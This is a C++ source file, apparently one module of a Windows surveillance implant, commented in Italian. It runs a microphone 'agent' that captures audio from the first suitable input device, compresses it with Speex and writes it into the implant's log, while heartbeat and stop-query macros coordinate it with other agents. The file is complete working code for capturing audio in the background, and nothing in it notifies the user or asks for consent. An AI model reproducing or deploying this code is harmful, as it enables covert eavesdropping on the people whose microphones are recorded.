#include "Common.h"
#include <mmsystem.h>
#include <winreg.h>
#include "CWaveForm.h"
#include "speex/speex.h"

#include "Conf.h"
#include "Agents.h"
#include <exception>
#include "Microphone.h"

MicAdditionalData mad;
BOOL bMicIsrecording;
DWORD dwMicBuffInCount;
WAVEHDR	tagMicWaveHdr[MIC_COUNT_BUFF];
CWaveformIn *micAgent;

DWORD mic_buffer_len = MIC_DEF_BUFFER_LEN;
DWORD mic_compress_factor = MIC_DEF_COMPRESS_FACTOR; 

void MicSaveEncode(BYTE *wave, DWORD total_size)
{
	short *bit_sample;
	void *state;
	float *input;
	BYTE *to_write;
	BYTE *source_ptr;
	BYTE *cbits;
	SpeexBits bits;
	DWORD frame_size = 0;
	DWORD i, nbBytes;	
	DWORD complexity = 1;

	// Crea un nuovo encoder in wide mode
	state = speex_encoder_init(speex_lib_get_mode(SPEEX_MODEID_UWB));
	speex_encoder_ctl(state, SPEEX_SET_QUALITY, &mic_compress_factor);
	speex_encoder_ctl(state, SPEEX_SET_COMPLEXITY, &complexity);
	speex_bits_init(&bits);
	speex_encoder_ctl(state, SPEEX_GET_FRAME_SIZE, &frame_size);

	if (!frame_size) {
		SPEEX_FREE;
		return;
	}

	// Allochiamo il buffer di output grande quanto quello originale (per sicurezza)
	if (!(to_write = new(std::nothrow) BYTE[frame_size*MIC_SAMPLE_SIZE])) {
		SPEEX_FREE;
		return;
	}
	cbits = to_write + sizeof(DWORD); // Punta al blocco dati, mentre la prima DWORD conterra' la dimensione

	// Allochiamo il buffer di elaborazione
	if (!(input = new(std::nothrow) FLOAT[frame_size])) {
		SAFE_DELETE(to_write);
		SPEEX_FREE;
		return;
	}

	Log *log = new(std::nothrow) Log;

	if(log == NULL) {
		SAFE_DELETE(to_write);
		SAFE_DELETE(input);	
		SPEEX_FREE;
		return;
	}

	if(log->WriteLog(AGENT_MIC, 0, 0, (BYTE *)&mad, 0, sizeof(mad)) == FALSE) {
		SAFE_DELETE(to_write);
		SAFE_DELETE(input);
		delete log;
		SPEEX_FREE;
		return;
	}

	// Continua finche' dopo source_ptr non rimane ancora spazio per un frame intero
	for (source_ptr=wave; source_ptr+(frame_size*MIC_SAMPLE_SIZE)<=wave+total_size; source_ptr+=(frame_size*MIC_SAMPLE_SIZE)) {
		// Copiamo i campioni a 16 bit dentro dei float
		bit_sample = (short *)source_ptr;
		for (i=0; i<frame_size; i++)
			input[i] =  bit_sample[i];

		speex_bits_reset(&bits);
		speex_encode(state, input, &bits);
		// Encoda dentro il buffer di output
		nbBytes = speex_bits_write(&bits, (char *)cbits, frame_size*MIC_SAMPLE_SIZE);
		if (nbBytes > (frame_size*MIC_SAMPLE_SIZE))
			continue; // Check paranoico
		// Copia la lunghezza nei primi 4 byte per fare un unica scrittura su file
		memcpy(to_write, &nbBytes, sizeof(DWORD)); 
		log->AppendLog(to_write, nbBytes + sizeof(DWORD));
	}

	log->CloseLog();
	delete log;
	SAFE_DELETE(to_write);
	SAFE_DELETE(input);
	SPEEX_FREE;
}


void CALLBACK MicwaveInProc(HWAVEIN hwi, UINT uMsg, DWORD dwInstance, WAVEHDR *dwParam1, DWORD dwParam2)
{
	if (uMsg == MM_WIM_DATA) {
		if (dwParam1->dwBytesRecorded > 0)
			MicSaveEncode((BYTE *)dwParam1->lpData, dwParam1->dwBytesRecorded);

		if (bMicIsrecording) {
			waveInUnprepareHeader(hwi, dwParam1, sizeof(WAVEHDR));

			dwParam1->dwFlags = 0;
			dwParam1->dwBytesRecorded = 0;
			waveInPrepareHeader(hwi, dwParam1, sizeof(WAVEHDR));
			waveInAddBuffer(hwi, dwParam1, sizeof(WAVEHDR));
		} else {
			dwMicBuffInCount++;	
		}
	}
}

BOOL MicRecordStop()
{
	if (micAgent == NULL)
		return FALSE;

	bMicIsrecording = FALSE;
	micAgent->Reset();

	// Aspetta che abbia flushato i buffer
	while(dwMicBuffInCount < MIC_COUNT_BUFF)
		Sleep(500);

	micAgent->Close();
	for (int j=0; j<MIC_COUNT_BUFF; j++) {
		micAgent->UnprepareHeader(&(tagMicWaveHdr[j]), sizeof(WAVEHDR));
		SAFE_FREE(tagMicWaveHdr[j].lpData);
	}
	delete micAgent;
	micAgent = NULL;
	return TRUE;
}


BOOL MicRecordStart()
{
	WAVEFORMATEX in_pcmWaveFormat;
	CWaveform wave;
	UINT count = CWaveform::InGetNumDevs();

	dwMicBuffInCount = 0;

	for(UINT i = 0; i < count && micAgent == NULL; i++) {
		WAVEINCAPS wic;

		CWaveform::InGetDevCaps(i, &wic, sizeof(WAVEINCAPS));
		if (wic.dwFormats & WAVE_FORMAT_1M16) {
			ZeroMemory(&in_pcmWaveFormat, sizeof(WAVEFORMATEX));
			CWaveform::PrepareWaveFormat(&in_pcmWaveFormat, WAVE_FORMAT_PCM, 1, 8000L, 16);
			micAgent = wave.InOpen(i, &in_pcmWaveFormat, (DWORD_PTR) MicwaveInProc, 0, CALLBACK_FUNCTION);
		}
	}

	if (micAgent == NULL) 
		return FALSE;

	ZeroMemory(tagMicWaveHdr, sizeof(tagMicWaveHdr));
	for (int j=0; j<MIC_COUNT_BUFF; j++) {
		tagMicWaveHdr[j].dwBufferLength = mic_buffer_len;
		tagMicWaveHdr[j].dwLoops = 1;
		// Alloca i buffer di registrazione e li prepara
		if ( !(tagMicWaveHdr[j].lpData = (char *)new(std::nothrow) CHAR[tagMicWaveHdr[j].dwBufferLength]) )  {
			for (int k=0; k<j; k++) {
				SAFE_DELETE(tagMicWaveHdr[k].lpData);
			}

			micAgent->Close();
			delete micAgent;
			micAgent = NULL;
			return FALSE;
		}
	}

	for (int j=0; j<MIC_COUNT_BUFF; j++) { 
		micAgent->PrepareHeader(&(tagMicWaveHdr[j]), sizeof(WAVEHDR));
		micAgent->AddBuffer(&(tagMicWaveHdr[j]), sizeof(WAVEHDR));
	}

	bMicIsrecording = TRUE;
	micAgent->Start();

	return TRUE;
}

DWORD WINAPI RecordedMicrophone(LPVOID lpParam) {
	COMMON_DATA(AGENT_MIC);
	BOOL bStop;

	bMicIsrecording = FALSE;
	micAgent = NULL;
	
	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		STOP_ME;
	}

	// Valorizza eventuali parametri 

	I_AM_ALIVE;
	unsigned __int64 temp_time = GetTime();

	mad.start.dwHighDateTime = (DWORD)((temp_time & 0xffffffff00000000) >> 32);
	mad.start.dwLowDateTime = (DWORD)(temp_time & 0x00000000ffffffff);

	MicRecordStart();

	while(1) {
		QUERY_STOP(bStop);
		if(bStop) {
			MicRecordStop();
			STOP_ME;
		} else {
			Sleep(1000);
		}
	}

	STOP_ME;
	return 0;
}